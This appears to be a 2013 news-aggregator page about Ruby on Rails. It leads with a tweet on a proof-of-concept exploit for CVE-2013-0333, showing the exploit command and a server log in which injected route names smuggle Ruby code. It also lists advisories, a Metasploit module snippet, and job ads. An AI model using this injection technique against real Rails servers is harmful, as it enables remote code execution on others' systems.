29 Jan '13, 6am

Rails PoC exploit for CVE-2013-0333. #rails

$ rails_omakase http://localhost:3000/secrets "puts 'lol'" lol Started POST "/secrets" for 127.0.0.1 at 2013-01-28 18:53:18 -0800 Processing by SecretsController#show as Parameters: {"_json"=>#<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0x00000002221080 @routes={:"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n"=>#<struct defaults={:action=>"create", :controller=>"foos"}, required_parts=[], requirements={:action=>"create", :controller=>"foos"}, segment_keys=[:format]>}, @helpers=[:"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path"], @module=#<Module:0x00000002220fb8>>} ...

Full article: http://ronin-ruby.github.com/blog/2013/01/28/new-rails-po...

Tweets

Weitere kritische Lücke in Ruby on Rails geschl...

heise.de 29 Jan '13, 1pm

Das Ruby-Entwicklerteam hat eine sehr kritische Lücke in dem Web-Framework Ruby on Rails (RoR) geschlossen, durch die ein ...

Weitere kritische Lücke in Ruby on Rails geschl...

heise.de 29 Jan '13, 2pm

Das Ruby-Entwicklerteam hat eine sehr kritische Lücke in dem Web-Framework Ruby on Rails (RoR) geschlossen, durch die ein ...

[remote] - Ruby on Rails JSON Processor YAML De...

exploit-db.com 29 Jan '13, 3pm

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Ple...

Some Versions of Ruby on Rails Vulnerable to Ne...

threatpost.com 29 Jan '13, 6pm

A vulnerability exists in Ruby on Rails’ JavaScript Object Notation (JSON) code that could open the Web framework up to a ...

Ruby on Rails の JSON 解析処理に脆弱性

jvn.jp 29 Jan '13, 3am

Ruby on Rails [SEC][ANN] Rails 3.0.20, and 2.3.16 have been released! Vulnerability in JSON Parser in Ruby on Rails 3.0 an...

「Ruby on Rails」に深刻な脆弱性 - 今月2度目のアップデート: 2013/01/28

security-next.com 29 Jan '13, 6am

「Ruby on Rails」に深刻な脆弱性 - 今月2度目のアップデート 「Ruby on Rails」に深刻な脆弱性が見つかり、アップデートが公開された。1月8日に公開されたアップデートとは異なる内容のため注意する必要がある。 同ソフトにお...

Do you know how to setup Paypal Payflow in Rails?

rubyflow.com 30 Jan '13, 12am

Do you know how to setup Paypal Payflow in Rails? Posted by IndianGuru on January 29, 2013 — 0 comments Learn how to setup...

#Ruby #On #Rails Rails: How do you access the v...

rqna.net 26 Jan '13, 10pm

I'm trying to access the value that a user chooses by manipulating the jQuery Mobile slider. For example, I have a slider ...

#UK [contract] Ruby on Rails Developer - Contra...

contractjob.net 27 Jan '13, 10am

Ruby on Rails Developer - Contract - London. I currently have an opening for a talented Ruby on Rails Developer to join my...

Your Net Works, Inc.: Ruby Rails Developer: Loc...

jobs.37signals.com 29 Jan '13, 3am

A San Francisco based social media company is looking for a Ruby on Rails Developer for a full time contract for an online...

AppAcademy (Ruby on Rails) bootcamp & landing j...

reddit.com 28 Jan '13, 3am

I was really excited to find this morning that I had been accepted into the May class of http://www.appacademy.io/ ! But I...

the best source for information on rails plural...

slash7.com 26 Jan '13, 6pm

Posted on November 17, 2005, 7:32 am, by Amy Hoy, under Home , articles , rails , tips and tricks . Into JavaScript? Have ...

Ruby on Rails Study Guide: The History of Rails

heydesigner.com 23 Jan '13, 7pm

Sublime SFTP – an FTP, FTPS & SFTP Package for Sublime Text 2 posted by wbond.net Spend less time managing file transfers ...

New Job Alert: Ruby on Rails Developer at Strat...

simplyhired.com 27 Jan '13, 1am

Ruby on Rails Developer New York City (Mid-town) Permanent, Direct hire position COMPANY PROFILE: Multi-billion dollar med...